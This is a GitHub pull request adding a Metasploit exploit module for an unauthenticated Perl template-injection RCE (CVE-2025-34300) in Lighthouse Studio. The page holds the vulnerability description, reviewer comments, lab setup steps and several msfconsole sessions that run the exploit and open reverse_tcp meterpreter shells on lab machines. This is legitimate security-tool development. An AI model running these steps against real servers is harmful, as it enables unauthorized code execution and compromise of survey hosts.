Skip to content

Add Lighthouse Studio unauthenticated RCE (CVE-2025-34300) #20397

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Open
wants to merge 18 commits into
base: master
Choose a base branch
from
Open

Add Lighthouse Studio unauthenticated RCE (CVE-2025-34300) #20397

wants to merge 18 commits into from
+540 −0

Conversation

vognik
Copy link
Contributor

@vognik vognik commented Jul 20, 2025

Vulnerability Details

This module exploits a template injection vulnerability in the
Sawtooth Software Lighthouse Studio's ciwweb.pl web application.
The application fails to properly sanitize user input within survey templates,
allowing unauthenticated attackers to inject and execute arbitrary Perl commands
on the target system.

This vulnerability affects Lighthouse Studio versions prior to 9.16.14.
Successful exploitation may result in remote code execution under the privileges
of the web server, potentially exposing sensitive data or disrupting survey operations.

An attacker can execute arbitrary system commands as the web server.

Module Information

Module path: exploit/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300
Platform: Linux/Unix/Windows
Tested on: Ubuntu 18.0.4 / Windows 10
Requirements: Nothing

References

Original Research
https://slcyber.io/assetnote-security-research-center/rce-in-the-most-popular-survey-software-youve-never-heard-of/

Test Output

msf6 > use exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300) > show options

Module options (exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300):

   Name       Current Setting     Required  Description
   ----       ---------------     --------  -----------
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                         yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      80                  yes       The target port (TCP)
   SSL        false               no        Negotiate SSL/TLS for outgoing connections
   SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)
   STUDYNAME                      no        Value for the hid_studyname GET parameter
   TARGETURI  /cgi-bin/ciwweb.pl  yes       Path to vulnerable ciwweb.pl
   URIPATH                        no        The URI to use for this exploit (default is random)
   VHOST                          no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux Dropper



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300) > set RHOSTS 192.168.19.129
RHOSTS => 192.168.19.129
msf6 exploit(multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300) > set STUDYNAME 123
STUDYNAME => 123
msf6 exploit(multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300) > set LHOST eth0
LHOST => 192.168.19.130
msf6 exploit(multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300) > set SRVPORT 9999
SRVPORT => 9999
msf6 exploit(multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300) > run

[*] Started reverse TCP handler on 192.168.19.130:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Extracting version...
[*] Extracted version: 9.16.12
[+] The target appears to be vulnerable.
[*] Uploading malicious payload...
[*] Command Stager progress -  44.31% done (362/817 bytes)
[*] Uploading malicious payload...
[*] Sending stage (3045380 bytes) to 192.168.19.129
[*] Meterpreter session 1 opened (192.168.19.130:4444 -> 192.168.19.129:39790) at 2025-07-20 07:04:31 -0400
[*] Command Stager progress -  97.31% done (795/817 bytes)
[*] Uploading malicious payload...
[*] Command Stager progress - 100.00% done (817/817 bytes)

meterpreter > sysinfo
Computer     : 192.168.19.129
OS           : Ubuntu 18.04 (Linux 5.4.0-150-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

jvoisin
jvoisin suggested changes Jul 21, 2025
View reviewed changes
@jheysel-r7 jheysel-r7 self-assigned this Jul 22, 2025
jheysel-r7
jheysel-r7 reviewed Jul 23, 2025
View reviewed changes
Copy link
Contributor

@jheysel-r7 jheysel-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thanks for the module @vognik. A couple comments.

Testing

msf6 exploit(multi/http/lighthouse_studio_unauth_rce_cve_2025_34300) > set rhosts 172.16.199.132
rhosts => 172.16.199.132
msf6 exploit(multi/http/lighthouse_studio_unauth_rce_cve_2025_34300) > set studyname test
studyname => test
msf6 exploit(multi/http/lighthouse_studio_unauth_rce_cve_2025_34300) > set writabledir /tmp
writabledir => /tmp
msf6 exploit(multi/http/lighthouse_studio_unauth_rce_cve_2025_34300) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(multi/http/lighthouse_studio_unauth_rce_cve_2025_34300) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/lighthouse_studio_unauth_rce_cve_2025_34300) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Extracting version...
[*] Extracted version: 9.16.12
[+] The target appears to be vulnerable.
[*] Uploading malicious payload...
[*] Sending stage (3045380 bytes) to 172.16.199.132
[*] Meterpreter session 2 opened (172.16.199.1:4444 -> 172.16.199.132:36724) at 2025-07-23 10:39:29 -0700

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer     : 172.16.199.132
OS           : Ubuntu 18.04 (Linux 5.4.0-150-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

@vognik
Copy link
Contributor Author

vognik commented Jul 24, 2025
edited
Loading

@bwatters-r7, @jheysel-r7 Thanks for the code review and valuable advice!

The cmd/windows/http/x64/meterpreter/reverse_tcp payload worked only when I added cmd.exe /c, but the problem still persists that for some unknown reason it does not resolve environment variables (like %TEMP%, which is the default).

That's why I had files with %TEMP% in the file name saved in cgi-bin (and in general, the payload ran every other time).
image

image

So I still left the override of the default temporary directory (with absolute path), this works quite well

sjanusz-r7
sjanusz-r7 reviewed Jul 24, 2025
View reviewed changes
jheysel-r7
jheysel-r7 reviewed Aug 13, 2025
View reviewed changes
Copy link
Contributor

@jheysel-r7 jheysel-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Hey @vognik, thanks for making those changes. I was able to test successfully on Windows and everything is looking just about good to go. Just a couple suggestion to the documentation.

Windows Testing

msf6 exploit(multi/http/lighthouse_studio_unauth_rce_cve_2025_34300) > run
[*] Started reverse TCP handler on 172.16.199.131:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Extracting version...
[*] Extracted version: 9.16.12
[+] The target appears to be vulnerable.
[*] Uploading malicious payload...
[*] Sending stage (203846 bytes) to 172.16.199.135
[*] Meterpreter session 1 opened (172.16.199.131:4444 -> 172.16.199.135:51051) at 2025-08-13 17:22:25 -0400


meterpreter >
meterpreter > getuid
Server username: DESKTOP-0OPTL76\msfuser
meterpreter > sysinfo
Computer        : DESKTOP-0OPTL76
OS              : Windows 10 (10.0 Build 19045).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter >

documentation/modules/exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300.md
The `STUDYNAME` parameter must be set manually if the server responds with the error `Cannot find default studyname`, which occurs when the `hid_studyname` parameter is not provided.
The `hid_studyname` parameter serves as the identifier of the survey or test being executed.

## Testing
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Suggested change
## Testing
## Testing
### Setup a Linux Server to Host the Lighhouse Survey

documentation/modules/exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300.md

11. Download and Install Windows (on Second VM)

Download Windows 10 ISO from the official Microsoft site:
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

We might have to edit the numbering of the steps here if you don't mind. This way we can separate, Linux Server Setup, Windows Server Setup and Survey Creation into three separate parts.

Suggested change
Download Windows 10 ISO from the official Microsoft site:
### Create the Lighthouse Survey
Download Windows 10 ISO from the official Microsoft site:

documentation/modules/exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300.md
OR (in case of any errors)

Use this instruction to upload manually [Manual Upload to Server](https://sawtoothsoftware.com/help/lighthouse-studio/manual/manual-upload.html)

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Setup a Windows Server to Host Lighthouse Survey

  • Install xampp
  • Place survey for manual upload in c:\xampp\htdocs\
  • Install Perl 5.38
  • The .pl and .cgi files LightHouse generates will start with #!/usr/bin/pearl which windows will fail to interpret
    • Either find and replace these with #!C:/Strawberry/perl/bin/perl.exe or edit the apache config such that Apache will always send these files to Strawberry Perl
  • Make the same edits to the Apache config as you would do on Linux to make the cgi scripts executable
  • Install the same Perl modules as you would during the Linux install
  • In phpMyAdmin, create the DB user and DB specified in the Survey you created in Lighthouse
    • Ensure the user has the necessary privileges over the DB
  • Navigate the to the /<SurveyName>/WebUpload/cgi-bin/admin.pl endpoint in the survey, authenticate with the admin credentials and ensure the the DB is connected and there were no errors durning setup

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@bwatters-r7 bwatters-r7 bwatters-r7 left review comments

@jheysel-r7 jheysel-r7 jheysel-r7 left review comments

@sjanusz-r7 sjanusz-r7 sjanusz-r7 left review comments

@jvoisin jvoisin jvoisin requested changes

At least 1 approving review is required to merge this pull request.

Assignees

@jheysel-r7 jheysel-r7

Labels
docs module
Projects
Metasploit Kanban
Status: Todo
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
5 participants
@vognik @jvoisin @bwatters-r7 @jheysel-r7 @sjanusz-r7